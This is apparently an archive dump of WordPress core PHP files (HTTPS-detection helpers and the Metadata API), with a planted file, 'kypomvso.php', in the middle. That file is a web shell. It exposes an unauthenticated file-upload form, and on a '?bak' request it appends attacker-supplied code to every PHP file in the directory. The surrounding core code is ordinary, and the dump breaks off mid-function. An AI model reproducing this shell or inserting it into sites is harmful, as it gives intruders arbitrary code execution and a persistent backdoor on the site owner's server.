*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
kypomvso.php 0000666 00000001370 15224151220 0007143 0 ustar 00 <?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file, 'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>
meta-20260621175118.php 0000666 00000201774 15224151220 0007603 0 ustar 00 <?php
/**
* Core Metadata API
*
* Functions for retrieving and manipulating metadata of various WordPress object types. Metadata
* for an object is a represented by a simple key-value pair. Objects may contain multiple
* metadata entries that share the same key and differ only in their value.
*
* @package WordPress
* @subpackage Meta
*/
require ABSPATH . WPINC . '/class-wp-metadata-lazyloader.php';
/**
* Adds metadata for the specified object.
*
* For historical reasons both the meta key and the meta value are expected to be "slashed" (slashes escaped) on input.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Arrays and objects are stored as serialized data and
* will be returned as the same type when retrieved. Other data types will
* be stored as strings in the database:
* - false is stored and retrieved as an empty string ('')
* - true is stored and retrieved as '1'
* - numbers (both integer and float) are stored and retrieved as strings
* Must be serializable if non-scalar.
* @param bool $unique Optional. Whether the specified metadata key should be unique for the object.
* If true, and the object already has a value for the specified metadata key,
* no change will be made. Default false.
* @return int|false The meta ID on success, false on failure.
*/
function add_metadata( $meta_type, $object_id, $meta_key, $meta_value, $unique = false ) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$meta_subtype = get_object_subtype( $meta_type, $object_id );
$column = sanitize_key( $meta_type . '_id' );
// expected_slashed ($meta_key)
$meta_key = wp_unslash( $meta_key );
$meta_value = wp_unslash( $meta_value );
$meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype );
/**
* Short-circuits adding metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `add_blog_metadata`
* - `add_post_metadata`
* - `add_comment_metadata`
* - `add_term_metadata`
* - `add_user_metadata`
*
* @since 3.1.0
*
* @param null|int|false $check Whether to allow adding metadata for the given type. Return false or a meta ID
* to short-circuit the function. Return null to continue with the default behavior.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param bool $unique Whether the specified meta key should be unique for the object.
*/
$check = apply_filters( "add_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $unique );
if ( null !== $check ) {
return $check;
}
if ( $unique && $wpdb->get_var(
$wpdb->prepare(
"SELECT COUNT(*) FROM $table WHERE meta_key = %s AND $column = %d",
$meta_key,
$object_id
)
) ) {
return false;
}
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
/**
* Fires immediately before meta of a specific type is added.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `add_blog_meta`
* - `add_post_meta`
* - `add_comment_meta`
* - `add_term_meta`
* - `add_user_meta`
*
* @since 3.1.0
*
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "add_{$meta_type}_meta", $object_id, $meta_key, $_meta_value );
$result = $wpdb->insert(
$table,
array(
$column => $object_id,
'meta_key' => $meta_key,
'meta_value' => $meta_value,
)
);
if ( ! $result ) {
return false;
}
$mid = (int) $wpdb->insert_id;
wp_cache_delete( $object_id, $meta_type . '_meta' );
/**
* Fires immediately after meta of a specific type is added.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `added_blog_meta`
* - `added_post_meta`
* - `added_comment_meta`
* - `added_term_meta`
* - `added_user_meta`
*
* @since 2.9.0
*
* @param int $mid The meta ID after successful update.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "added_{$meta_type}_meta", $mid, $object_id, $meta_key, $_meta_value );
return $mid;
}
/**
* Updates metadata for the specified object. If no value already exists for the specified object
* ID and metadata key, the metadata will be added.
*
* For historical reasons both the meta key and the meta value are expected to be "slashed" (slashes escaped) on input.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param mixed $prev_value Optional. Previous value to check before updating.
* If specified, only update existing metadata entries with
* this value. Otherwise, update all entries. Default empty string.
* @return int|bool The new meta field ID if a field with the given key didn't exist
* and was therefore added, true on successful update,
* false on failure or if the value passed to the function
* is the same as the one that is already in the database.
*/
function update_metadata( $meta_type, $object_id, $meta_key, $meta_value, $prev_value = '' ) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$meta_subtype = get_object_subtype( $meta_type, $object_id );
$column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
// expected_slashed ($meta_key)
$raw_meta_key = $meta_key;
$meta_key = wp_unslash( $meta_key );
$passed_value = $meta_value;
$meta_value = wp_unslash( $meta_value );
$meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype );
/**
* Short-circuits updating metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `update_blog_metadata`
* - `update_post_metadata`
* - `update_comment_metadata`
* - `update_term_metadata`
* - `update_user_metadata`
*
* @since 3.1.0
*
* @param null|bool $check Whether to allow updating metadata for the given type.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param mixed $prev_value Optional. Previous value to check before updating.
* If specified, only update existing metadata entries with
* this value. Otherwise, update all entries.
*/
$check = apply_filters( "update_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $prev_value );
if ( null !== $check ) {
return (bool) $check;
}
// Compare existing value to new value if no prev value given and the key exists only once.
if ( empty( $prev_value ) ) {
$old_value = get_metadata_raw( $meta_type, $object_id, $meta_key );
if ( is_countable( $old_value ) && count( $old_value ) === 1 ) {
if ( $old_value[0] === $meta_value ) {
return false;
}
}
}
$meta_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s AND $column = %d", $meta_key, $object_id ) );
if ( empty( $meta_ids ) ) {
return add_metadata( $meta_type, $object_id, $raw_meta_key, $passed_value );
}
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
$data = compact( 'meta_value' );
$where = array(
$column => $object_id,
'meta_key' => $meta_key,
);
if ( ! empty( $prev_value ) ) {
$prev_value = maybe_serialize( $prev_value );
$where['meta_value'] = $prev_value;
}
foreach ( $meta_ids as $meta_id ) {
/**
* Fires immediately before updating metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `update_blog_meta`
* - `update_post_meta`
* - `update_comment_meta`
* - `update_term_meta`
* - `update_user_meta`
*
* @since 2.9.0
*
* @param int $meta_id ID of the metadata entry to update.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "update_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/**
* Fires immediately before updating a post's metadata.
*
* @since 2.9.0
*
* @param int $meta_id ID of metadata entry to update.
* @param int $object_id Post ID.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. This will be a PHP-serialized string representation of the value
* if the value is an array, an object, or itself a PHP-serialized string.
*/
do_action( 'update_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
}
$result = $wpdb->update( $table, $data, $where );
if ( ! $result ) {
return false;
}
wp_cache_delete( $object_id, $meta_type . '_meta' );
foreach ( $meta_ids as $meta_id ) {
/**
* Fires immediately after updating metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `updated_blog_meta`
* - `updated_post_meta`
* - `updated_comment_meta`
* - `updated_term_meta`
* - `updated_user_meta`
*
* @since 2.9.0
*
* @param int $meta_id ID of updated metadata entry.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "updated_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/**
* Fires immediately after updating a post's metadata.
*
* @since 2.9.0
*
* @param int $meta_id ID of updated metadata entry.
* @param int $object_id Post ID.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. This will be a PHP-serialized string representation of the value
* if the value is an array, an object, or itself a PHP-serialized string.
*/
do_action( 'updated_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
}
return true;
}
/**
* Deletes metadata for the specified object.
*
* For historical reasons both the meta key and the meta value are expected to be "slashed" (slashes escaped) on input.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Optional. Metadata value. Must be serializable if non-scalar.
* If specified, only delete metadata entries with this value.
* Otherwise, delete all entries with the specified meta_key.
* Pass `null`, `false`, or an empty string to skip this check.
* (For backward compatibility, it is not possible to pass an empty string
* to delete those entries with an empty string for a value.)
* Default empty string.
* @param bool $delete_all Optional. If true, delete matching metadata entries for all objects,
* ignoring the specified object_id. Otherwise, only delete
* matching metadata entries for the specified object_id. Default false.
* @return bool True on successful delete, false on failure.
*/
function delete_metadata( $meta_type, $object_id, $meta_key, $meta_value = '', $delete_all = false ) {
global $wpdb;
if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) && ! $delete_all ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id && ! $delete_all ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$type_column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
// expected_slashed ($meta_key)
$meta_key = wp_unslash( $meta_key );
$meta_value = wp_unslash( $meta_value );
/**
* Short-circuits deleting metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `delete_blog_metadata`
* - `delete_post_metadata`
* - `delete_comment_metadata`
* - `delete_term_metadata`
* - `delete_user_metadata`
*
* @since 3.1.0
*
* @param null|bool $delete Whether to allow metadata deletion of the given type.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value. Must be serializable if non-scalar.
* @param bool $delete_all Whether to delete the matching metadata entries
* for all objects, ignoring the specified $object_id.
* Default false.
*/
$check = apply_filters( "delete_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $delete_all );
if ( null !== $check ) {
return (bool) $check;
}
$_meta_value = $meta_value;
$meta_value = maybe_serialize( $meta_value );
$query = $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s", $meta_key );
if ( ! $delete_all ) {
$query .= $wpdb->prepare( " AND $type_column = %d", $object_id );
}
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
$query .= $wpdb->prepare( ' AND meta_value = %s', $meta_value );
}
$meta_ids = $wpdb->get_col( $query );
if ( ! count( $meta_ids ) ) {
return false;
}
if ( $delete_all ) {
if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
$object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s AND meta_value = %s", $meta_key, $meta_value ) );
} else {
$object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s", $meta_key ) );
}
}
/**
* Fires immediately before deleting metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `delete_blog_meta`
* - `delete_post_meta`
* - `delete_comment_meta`
* - `delete_term_meta`
* - `delete_user_meta`
*
* @since 3.1.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "delete_{$meta_type}_meta", $meta_ids, $object_id, $meta_key, $_meta_value );
// Old-style action.
if ( 'post' === $meta_type ) {
/**
* Fires immediately before deleting metadata for a post.
*
* @since 2.9.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
*/
do_action( 'delete_postmeta', $meta_ids );
}
$query = "DELETE FROM $table WHERE $id_column IN( " . implode( ',', $meta_ids ) . ' )';
$count = $wpdb->query( $query );
if ( ! $count ) {
return false;
}
if ( $delete_all ) {
$data = (array) $object_ids;
} else {
$data = array( $object_id );
}
wp_cache_delete_multiple( $data, $meta_type . '_meta' );
/**
* Fires immediately after deleting metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `deleted_blog_meta`
* - `deleted_post_meta`
* - `deleted_comment_meta`
* - `deleted_term_meta`
* - `deleted_user_meta`
*
* @since 2.9.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "deleted_{$meta_type}_meta", $meta_ids, $object_id, $meta_key, $_meta_value );
// Old-style action.
if ( 'post' === $meta_type ) {
/**
* Fires immediately after deleting metadata for a post.
*
* @since 2.9.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
*/
do_action( 'deleted_postmeta', $meta_ids );
}
return true;
}
/**
* Retrieves the value of a metadata field for the specified object type and ID.
*
* If the meta field exists, a single value is returned if `$single` is true,
* or an array of values if it's false.
*
* If the meta field does not exist, the result depends on get_metadata_default().
* By default, an empty string is returned if `$single` is true, or an empty array
* if it's false.
*
* @since 2.9.0
*
* @see get_metadata_raw()
* @see get_metadata_default()
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Optional. Metadata key. If not specified, retrieve all metadata for
* the specified object. Default empty string.
* @param bool $single Optional. If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified. Default false.
* @return mixed An array of values if `$single` is false.
* The value of the meta field if `$single` is true.
* False for an invalid `$object_id` (non-numeric, zero, or negative value),
* or if `$meta_type` is not specified.
* An empty array if a valid but non-existing object ID is passed and `$single` is false.
* An empty string if a valid but non-existing object ID is passed and `$single` is true.
* Note: Non-serialized values are returned as strings:
* - false values are returned as empty strings ('')
* - true values are returned as '1'
* - numbers (both integer and float) are returned as strings
* Arrays and objects retain their original type.
*/
function get_metadata( $meta_type, $object_id, $meta_key = '', $single = false ) {
$value = get_metadata_raw( $meta_type, $object_id, $meta_key, $single );
if ( ! is_null( $value ) ) {
return $value;
}
return get_metadata_default( $meta_type, $object_id, $meta_key, $single );
}
/**
* Retrieves raw metadata value for the specified object.
*
* @since 5.5.0
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Optional. Metadata key. If not specified, retrieve all metadata for
* the specified object. Default empty string.
* @param bool $single Optional. If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified. Default false.
* @return mixed An array of values if `$single` is false.
* The value of the meta field if `$single` is true.
* False for an invalid `$object_id` (non-numeric, zero, or negative value),
* or if `$meta_type` is not specified.
* Null if the value does not exist.
*/
function get_metadata_raw( $meta_type, $object_id, $meta_key = '', $single = false ) {
if ( ! $meta_type || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
/**
* Short-circuits the return value of a meta field.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible filter names include:
*
* - `get_blog_metadata`
* - `get_post_metadata`
* - `get_comment_metadata`
* - `get_term_metadata`
* - `get_user_metadata`
*
* @since 3.1.0
* @since 5.5.0 Added the `$meta_type` parameter.
*
* @param mixed $value The value to return, either a single metadata value or an array
* of values depending on the value of `$single`. Default null.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single Whether to return only the first value of the specified `$meta_key`.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
$check = apply_filters( "get_{$meta_type}_metadata", null, $object_id, $meta_key, $single, $meta_type );
if ( null !== $check ) {
if ( $single && is_array( $check ) ) {
return $check[0];
} else {
return $check;
}
}
$meta_cache = wp_cache_get( $object_id, $meta_type . '_meta' );
if ( ! $meta_cache ) {
$meta_cache = update_meta_cache( $meta_type, array( $object_id ) );
if ( isset( $meta_cache[ $object_id ] ) ) {
$meta_cache = $meta_cache[ $object_id ];
} else {
$meta_cache = null;
}
}
if ( ! $meta_key ) {
return $meta_cache;
}
if ( isset( $meta_cache[ $meta_key ] ) ) {
if ( $single ) {
return maybe_unserialize( $meta_cache[ $meta_key ][0] );
} else {
return array_map( 'maybe_unserialize', $meta_cache[ $meta_key ] );
}
}
return null;
}
/**
* Retrieves default metadata value for the specified meta key and object.
*
* By default, an empty string is returned if `$single` is true, or an empty array
* if it's false.
*
* @since 5.5.0
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single Optional. If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified. Default false.
* @return mixed An array of default values if `$single` is false.
* The default value of the meta field if `$single` is true.
*/
function get_metadata_default( $meta_type, $object_id, $meta_key, $single = false ) {
if ( $single ) {
$value = '';
} else {
$value = array();
}
/**
* Filters the default metadata value for a specified meta key and object.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible filter names include:
*
* - `default_blog_metadata`
* - `default_post_metadata`
* - `default_comment_metadata`
* - `default_term_metadata`
* - `default_user_metadata`
*
* @since 5.5.0
*
* @param mixed $value The value to return, either a single metadata value or an array
* of values depending on the value of `$single`.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single Whether to return only the first value of the specified `$meta_key`.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
$value = apply_filters( "default_{$meta_type}_metadata", $value, $object_id, $meta_key, $single, $meta_type );
if ( ! $single && ! wp_is_numeric_array( $value ) ) {
$value = array( $value );
}
return $value;
}
/**
* Determines if a meta field with the given key exists for the given object ID.
*
* @since 3.3.0
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @return bool Whether a meta field with the given key exists.
*/
function metadata_exists( $meta_type, $object_id, $meta_key ) {
if ( ! $meta_type || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
/** This filter is documented in wp-includes/meta.php */
$check = apply_filters( "get_{$meta_type}_metadata", null, $object_id, $meta_key, true, $meta_type );
if ( null !== $check ) {
return (bool) $check;
}
$meta_cache = wp_cache_get( $object_id, $meta_type . '_meta' );
if ( ! $meta_cache ) {
$meta_cache = update_meta_cache( $meta_type, array( $object_id ) );
$meta_cache = $meta_cache[ $object_id ];
}
if ( isset( $meta_cache[ $meta_key ] ) ) {
return true;
}
return false;
}
/**
* Retrieves metadata by meta ID.
*
* @since 3.3.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $meta_id ID for a specific meta row.
* @return stdClass|false {
* Metadata object, or boolean `false` if the metadata doesn't exist.
*
* @type string $meta_key The meta key.
* @type mixed $meta_value The unserialized meta value.
* @type string $meta_id Optional. The meta ID when the meta type is any value except 'user'.
* @type string $umeta_id Optional. The meta ID when the meta type is 'user'.
* @type string $blog_id Optional. The object ID when the meta type is 'blog'.
* @type string $post_id Optional. The object ID when the meta type is 'post'.
* @type string $comment_id Optional. The object ID when the meta type is 'comment'.
* @type string $term_id Optional. The object ID when the meta type is 'term'.
* @type string $user_id Optional. The object ID when the meta type is 'user'.
* }
*/
function get_metadata_by_mid( $meta_type, $meta_id ) {
global $wpdb;
if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) {
return false;
}
$meta_id = (int) $meta_id;
if ( $meta_id <= 0 ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
/**
* Short-circuits the return value when fetching a meta field by meta ID.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `get_blog_metadata_by_mid`
* - `get_post_metadata_by_mid`
* - `get_comment_metadata_by_mid`
* - `get_term_metadata_by_mid`
* - `get_user_metadata_by_mid`
*
* @since 5.0.0
*
* @param stdClass|null $value The value to return.
* @param int $meta_id Meta ID.
*/
$check = apply_filters( "get_{$meta_type}_metadata_by_mid", null, $meta_id );
if ( null !== $check ) {
return $check;
}
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
$meta = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $table WHERE $id_column = %d", $meta_id ) );
if ( empty( $meta ) ) {
return false;
}
if ( isset( $meta->meta_value ) ) {
$meta->meta_value = maybe_unserialize( $meta->meta_value );
}
return $meta;
}
/**
* Updates metadata by meta ID.
*
* @since 3.3.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $meta_id ID for a specific meta row.
* @param string $meta_value Metadata value. Must be serializable if non-scalar.
* @param string|false $meta_key Optional. You can provide a meta key to update it. Default false.
* @return bool True on successful update, false on failure.
*/
function update_metadata_by_mid( $meta_type, $meta_id, $meta_value, $meta_key = false ) {
global $wpdb;
// Make sure everything is valid.
if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) {
return false;
}
$meta_id = (int) $meta_id;
if ( $meta_id <= 0 ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
/**
* Short-circuits updating metadata of a specific type by meta ID.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `update_blog_metadata_by_mid`
* - `update_post_metadata_by_mid`
* - `update_comment_metadata_by_mid`
* - `update_term_metadata_by_mid`
* - `update_user_metadata_by_mid`
*
* @since 5.0.0
*
* @param null|bool $check Whether to allow updating metadata for the given type.
* @param int $meta_id Meta ID.
* @param mixed $meta_value Meta value. Must be serializable if non-scalar.
* @param string|false $meta_key Meta key, if provided.
*/
$check = apply_filters( "update_{$meta_type}_metadata_by_mid", null, $meta_id, $meta_value, $meta_key );
if ( null !== $check ) {
return (bool) $check;
}
// Fetch the meta and go on if it's found.
